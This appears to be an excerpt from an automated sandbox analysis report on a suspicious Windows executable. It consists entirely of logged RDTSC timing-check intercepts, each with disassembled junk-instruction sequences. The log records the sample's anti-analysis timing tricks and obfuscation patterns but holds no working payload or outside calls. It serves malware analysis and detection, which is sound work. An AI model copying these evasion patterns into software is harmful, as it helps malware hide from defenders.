    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4A6BB second address: F4A6F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0BACBDA19Bh 0x0000000d jmp 00007F0BACBDA1A9h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0BACBDA19Fh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4A6F8 second address: F4A707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4A707 second address: F4A711 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4A711 second address: F4A716 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F57D42 second address: F57D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F57D46 second address: F57D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0BACBDA3D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F57D51 second address: F57D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0BACBDA196h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jno 00007F0BACBDA1A7h 0x00000014 jmp 00007F0BACBDA19Fh 0x00000019 pushad 0x0000001a jmp 00007F0BACBDA19Bh 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F57D95 second address: F57D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F64BFC second address: F64C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jng 00007F0BACBDA1A2h 0x0000000d pop edi 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007F0BACBDA196h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F79E3E second address: F79E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F79E42 second address: F79E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7917E second address: F79192 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0BACBDA3D6h 0x00000008 jmp 00007F0BACBDA3DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F79192 second address: F791AB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BACBDA1A3h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F791AB second address: F791B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F791B1 second address: F791F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0BACBDA1A3h 0x00000010 jmp 00007F0BACBDA1A3h 0x00000015 jmp 00007F0BACBDA19Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F799DF second address: F799E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F799E3 second address: F799FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F799FD second address: F79A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F79A03 second address: F79A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7B4B5 second address: F7B4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DE64 second address: F7DE83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DE83 second address: F7DE87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DF45 second address: F7DF58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jnp 00007F0BACBDA196h 0x00000012 pop ecx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DF58 second address: F7DF5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DF5E second address: F7DF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DF62 second address: F7DF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7E1CE second address: F7E1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7E1D2 second address: F7E1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007F0BACBDA3E4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7E1E4 second address: F7E1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F80F8F second address: F80FAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0BACBDA3E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F80FAC second address: F80FD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BACBDA19Bh 0x00000008 jmp 00007F0BACBDA19Bh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 je 00007F0BACBDA1A6h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F80FD5 second address: F80FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E61 second address: F82E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0BACBDA196h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E6C second address: F82E76 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0BACBDA3DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E76 second address: F82E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 jnc 00007F0BACBDA196h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0BACBDA19Bh 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E93 second address: F82E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0BACBDA3D6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E9F second address: F82EAB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470758 second address: 547075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 547075E second address: 5470764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470764 second address: 5470768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470768 second address: 54707A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0BACBDA19Dh 0x00000015 and eax, 371AF4A6h 0x0000001b jmp 00007F0BACBDA1A1h 0x00000020 popfd 0x00000021 push esi 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54707A9 second address: 54707D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0BACBDA3E3h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54707D2 second address: 54707D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54707D6 second address: 54707DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54707DC second address: 5470816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 5Dh 0x0000000d mov cl, bh 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007F0BACBDA1A2h 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470816 second address: 547081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 547081C second address: 547086D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0BACBDA19Bh 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 mov al, 4Ch 0x00000013 push edi 0x00000014 pushfd 0x00000015 jmp 00007F0BACBDA19Ch 0x0000001a or eax, 568E3EF8h 0x00000020 jmp 00007F0BACBDA19Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 547086D second address: 5470871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470871 second address: 5470882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470882 second address: 54708BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d call 00007F0BACBDA3DCh 0x00000012 jmp 00007F0BACBDA3E2h 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ecx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54708BE second address: 5470963 instructions: 0x00000000 rdtsc 0x00000002 mov ah, bl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lea eax, dword ptr [ebp-04h] 0x0000000a jmp 00007F0BACBDA1A4h 0x0000000f nop 0x00000010 jmp 00007F0BACBDA1A0h 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007F0BACBDA1A1h 0x0000001c push eax 0x0000001d mov bx, 1EF2h 0x00000021 pop edi 0x00000022 popad 0x00000023 nop 0x00000024 pushad 0x00000025 call 00007F0BACBDA1A4h 0x0000002a mov dx, si 0x0000002d pop ecx 0x0000002e call 00007F0BACBDA1A7h 0x00000033 mov di, cx 0x00000036 pop ecx 0x00000037 popad 0x00000038 push dword ptr [ebp+08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F0BACBDA19Ch 0x00000044 adc ch, FFFFFF98h 0x00000047 jmp 00007F0BACBDA19Bh 0x0000004c popfd 0x0000004d mov di, si 0x00000050 popad 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470963 second address: 5470969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 547097D second address: 5470983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470A73 second address: 5470A8D instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0BACBDA3DCh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470A8D second address: 5470A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470A91 second address: 5470A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470A97 second address: 5470AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470AB0 second address: 5470ACD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470ACD second address: 5470ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA19Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470ADD second address: 5470AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0BACBDA3DAh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470AF2 second address: 5460011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BACBDA19Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f cmp eax, 00000000h 0x00000012 setne al 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F0BACBDA197h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F0BB136C087h 0x0000002a mov edi, edi 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F0BACBDA19Dh 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460011 second address: 5460070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0BACBDA3DCh 0x00000011 and si, 3CA8h 0x00000016 jmp 00007F0BACBDA3DBh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F0BACBDA3E6h 0x00000024 adc ax, 2F08h 0x00000029 jmp 00007F0BACBDA3DBh 0x0000002e popfd 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460070 second address: 54600CD instructions: 0x00000000 rdtsc 0x00000002 mov esi, 555FC17Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c call 00007F0BACBDA19Bh 0x00000011 pushfd 0x00000012 jmp 00007F0BACBDA1A8h 0x00000017 adc cx, 6498h 0x0000001c jmp 00007F0BACBDA19Bh 0x00000021 popfd 0x00000022 pop esi 0x00000023 call 00007F0BACBDA1A9h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54600CD second address: 54600DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a movzx eax, dx 0x0000000d mov bx, CCE6h 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54600DF second address: 54600E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54600E4 second address: 5460152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, 8Fh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F0BACBDA3DBh 0x00000010 sub esp, 2Ch 0x00000013 pushad 0x00000014 mov di, cx 0x00000017 mov ch, 20h 0x00000019 popad 0x0000001a push esi 0x0000001b jmp 00007F0BACBDA3E8h 0x00000020 mov dword ptr [esp], ebx 0x00000023 jmp 00007F0BACBDA3E0h 0x00000028 xchg eax, edi 0x00000029 jmp 00007F0BACBDA3E0h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0BACBDA3DEh 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54601B8 second address: 54601EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, 00000000h 0x0000000f jmp 00007F0BACBDA19Ah 0x00000014 inc ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0BACBDA1A7h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54601EB second address: 5460237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F0BACBDA3DEh 0x00000010 je 00007F0BACBDA5E3h 0x00000016 jmp 00007F0BACBDA3E0h 0x0000001b lea ecx, dword ptr [ebp-14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460237 second address: 546023B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546023B second address: 5460241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460241 second address: 5460250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA19Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460250 second address: 5460277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-14h], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460277 second address: 546027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, F2h 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546027E second address: 5460290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA3DEh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602BA second address: 54602C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602C0 second address: 54602D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA3E3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602D7 second address: 54602E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602E5 second address: 54602ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602ED second address: 54602F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602F3 second address: 54602F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
